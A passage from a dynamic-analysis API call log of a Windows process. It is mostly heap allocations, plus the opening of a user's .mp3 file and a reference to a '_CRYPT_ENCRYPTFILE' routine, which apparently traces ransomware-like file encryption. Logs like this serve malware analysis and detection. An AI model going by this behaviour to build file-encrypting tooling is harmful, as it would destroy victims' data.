g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\glkh.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0117.318] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0117.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0117.319] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0117.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0117.319] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.320] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0117.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0117.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.321] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0117.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0117.321] CloseHandle (hObject=0x298) returned 1 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.322] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.323] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0117.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0117.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0117.324] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0117.324] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0117.326] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0117.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.327] RtlAllocateHeap 